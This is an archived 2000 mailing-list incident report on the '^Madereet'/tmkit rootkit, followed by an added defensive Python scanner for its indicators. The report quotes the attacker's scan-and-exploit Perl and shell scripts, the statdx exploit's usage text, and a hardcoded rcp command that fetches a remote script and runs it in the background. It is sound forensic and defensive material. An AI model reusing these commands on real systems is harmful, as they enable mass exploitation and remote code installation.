Security Incidents mailing list archives

^Madereet (or tmkit)


From: Kristinn Torfason <kritor () MOBILESTOP COM>
Date: Wed, 1 Nov 2000 18:32:54 -0000

This concerns what seems to go by the name ^Madereet (or maybe more properly 'tmkit').

Around October 23rd my site, which was running an old Rh 6.0 installation, got hacked.
I don't know which hole the hacker used to break in but here is some information on
what he left behind, and how I noticed my systems had been compromised.

I noticed when issuing a ps command that it did not produce results in the format
I expected. A quick search for ps produced a copy in /dev/^Madereet/.backup at which
point I disconnected the network cable after issuing who, last, a history command and
looking at some of my logs. Only the logs provided some clues to what seemed to
have been a portscan.

After examining the bogus ps binary I decided to try running the one in the
/dev/^Madereet/.backup directory. That one seemed to be the original one, for it produced
the format I am used to seeing and also showed me a process 'synscan' running, which
I regretfully killed immediately. I should have attempted to examine if this thingy had any
connections going.

The /dev/^Madereet directory contained a '.backup' directory and an 'other' directory. The
'.backup' directory contained the files inetd, inetd.conf, netstat, and ps which
seemed to be backups of the original (normal) ones.

The 'other' directory contained the following files :

        28.done: ASCII text
        autohax: ELF 32-bit LSB executable
        start.pl: perl commands text
        statd:  ELF 32-bit LSB executable
        synscan: ELF 32-bit LSB executable
        do.sh: Bourne shell script text

The '28.done' file contained one line-feed character.

The 'start.pl' file contained the following :

        #!/usr/bin/perl
        $random = int( rand(230)) + 4;
        system("./synscan '$random' '$random.statd' eth0 100 111");
        system("./do.sh '$random'");

The 'do.sh' file contained the following :

        #!/bin/sh
        cat $1.statd | grep statd > $1.new
        rm $1.statd
        cat $1.new | cut -f1 -d'(' >$1.done
        rm $1.new
        nohup ./autohax $1.done &

A closer examination of the contents of the files left in /dev/^Madereet/other directory led to
some further information. An examination of the 'statd' binary there, simply using vi, disclosed
the following text :

statdx by ron1n shellcode () hotmail com
Usage: %s [-t] [-p port] [-a addr] [-l len]
        [-o offset] [-w num] [-s secs] [-d type] <target>
        -t attack a tcp dispatcher [udp]
        -p rpc.statd serves requests on <port> [query]
        -a the stack address of the buffer is <addr>
        -l the length of the buffer is <len> [1024]
        -o the offset to return to is <offset> [600]
        -w the number of dwords to wipe is <num> [9]
        -s set timeout in seconds to <secs> [5]
        -d use a hardcoded <type>
        Available types:
        %d    %s

This was followed by something quite interesting (I've replaced the actual IP with x's and the
user name with fubar) :

        rcp fubar () xxx xxx xx xx:/dev/ptyp/run-me.sh ./;chmod +x run-me.sh;nohup ./run-me.sh &

.. and then by the following text :

        OMG! You now have rpc.statd technique!

The hardcoded rcp command immediately caught my attention, so I hooked up the network cable
again and gave it a spin :

        rcp fubar () xxx xxx xx xx:/dev/ptyp/run-me.sh ./

.. which indeed got me a file called 'run-me.sh' which contained :

        #!/bin/sh
        rcp fubar () xxx xxx xx xx:/dev/ptyp/tm2.tgz ./;tar xzvf tm2.tgz;cd tm2
        ./setup

.. so I continued and did :

        rcp fubar () xxx xxx xx xx:/dev/ptyp/tm2.tgz ./

.. which got me the file 'tm2.tgz'.

This turns out to contain a base package similar to the one the hacker installed on my machine.

The machine hosting the 'fubar' account is a Solaris machine in Canada, and I think that machine
has been hacked, and now seems to serve as some kind of platform for the hacker(s). The 'fubar'
account on that machine seems to be wide open for rcp at least (planted .rhosts file?).

At this point, I have upgraded my gateway machine and shut all ports except 22 and 80,
and continue examining the 'tm2.tgz' package more closely. A first preliminary examination of
the package shows that it creates/modifies/exchanges the following files :

        /etc/inetd.conf, /usr/sbin/time, /bin/lpr, /bin/ps, /bin/netstat,
        /usr/sbin/inetd, /bin/ls, /var/log/secure, /var/log/messages,
        /sbin/rpc.statd, /dev/hdbp, /dev/hdaq, /dev/^Madereet,
        /dev/^Madereet/.backup, /dev/^Madereet/other, /var/named/ADMROCKS.

I would appreciate any comments, suggestions or feedback.

Best regards,
Kristinn Torfason
quirc () quirc com
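The file list at the end of the post is enough to build a simple host check. The script below is an added example, not code from Kristinn's post or from the tm2.tgz package: it looks for the paths the post says the kit creates (/dev/^Madereet and its subdirectories, /dev/hdbp, /dev/hdaq, /var/named/ADMROCKS) and, if the kit's '.backup' directory is present, hashes each stashed original (ps, netstat, inetd, inetd.conf) against the live copy, since the post shows the live ps was the trojaned one and the backup was the real one. Function names, the report layout and the demo tree are my own; the directory name is taken literally as printed ("^Madereet"), so if that "^M" is really a terminal rendering of a carriage return the constant would need adjusting. Run it with a root argument on a mounted image of the suspect disk, or with no argument to scan the constructed demo tree.

```python
#!/usr/bin/env python3
"""Added example (not from the original post): scan a filesystem tree for the
indicators described in the ^Madereet/tmkit report and compare the kit's
stashed backup binaries against the live ones."""
import hashlib
import os
import tempfile

# Paths the post lists as created by the tm2.tgz package (relative to root).
# Assumption: the "^M" in the directory name is the literal characters '^' 'M'.
RK_DIR = "dev/^Madereet"
INDICATOR_PATHS = [
    "dev/^Madereet", "dev/^Madereet/.backup", "dev/^Madereet/other",
    "dev/hdbp", "dev/hdaq", "var/named/ADMROCKS",
]
# The '.backup' directory held copies of these originals; the live file is the
# one the kit replaced (hypothetical mapping based on the file list in the post).
BACKUP_TO_LIVE = {
    "ps": "bin/ps",
    "netstat": "bin/netstat",
    "inetd": "usr/sbin/inetd",
    "inetd.conf": "etc/inetd.conf",
}


def sha256_file(path):
    """Hash a file in chunks so large binaries do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def scan(root="/"):
    """Return a report: which indicator paths exist, and for each backup binary
    whether the live copy is identical ('matches'), different ('trojaned') or
    absent ('missing').  'compromised' is True if anything suspicious was found."""
    report = {"indicators_present": [], "trojaned": [], "matches": [], "missing": []}
    for rel in INDICATOR_PATHS:
        if os.path.lexists(os.path.join(root, rel)):
            report["indicators_present"].append("/" + rel)
    backup_dir = os.path.join(root, RK_DIR, ".backup")
    if os.path.isdir(backup_dir):
        for name, live_rel in BACKUP_TO_LIVE.items():
            backup = os.path.join(backup_dir, name)
            live = os.path.join(root, live_rel)
            if not (os.path.isfile(backup) and os.path.isfile(live)):
                report["missing"].append("/" + live_rel)
                continue
            if sha256_file(backup) == sha256_file(live):
                report["matches"].append("/" + live_rel)
            else:
                report["trojaned"].append("/" + live_rel)
    report["compromised"] = bool(report["indicators_present"] or report["trojaned"])
    return report


def build_demo_tree():
    """Constructed sample tree that mimics the layout in the post; the file
    contents are placeholder text, not real binaries."""
    root = tempfile.mkdtemp(prefix="tmkit-demo-")

    def put(rel, data):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(data)

    put("dev/^Madereet/.backup/ps", b"original ps")
    put("bin/ps", b"replaced ps that hides synscan")      # differs from backup
    put("dev/^Madereet/.backup/netstat", b"original netstat")
    put("bin/netstat", b"original netstat")                # identical to backup
    put("dev/^Madereet/other/28.done", b"\n")              # the one-line-feed file
    put("var/named/ADMROCKS", b"")
    return root


if __name__ == "__main__":
    import json
    import sys

    target = sys.argv[1] if len(sys.argv) > 1 else build_demo_tree()
    print(json.dumps(scan(target), indent=2))
```

A hash match against the kit's own backup only tells you the kit did not touch that file; it does not vouch for the backup itself, so the real comparison should be against the vendor package's checksums (rpm -V on a Red Hat box) taken from a clean system, with the suspect disk mounted read-only.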
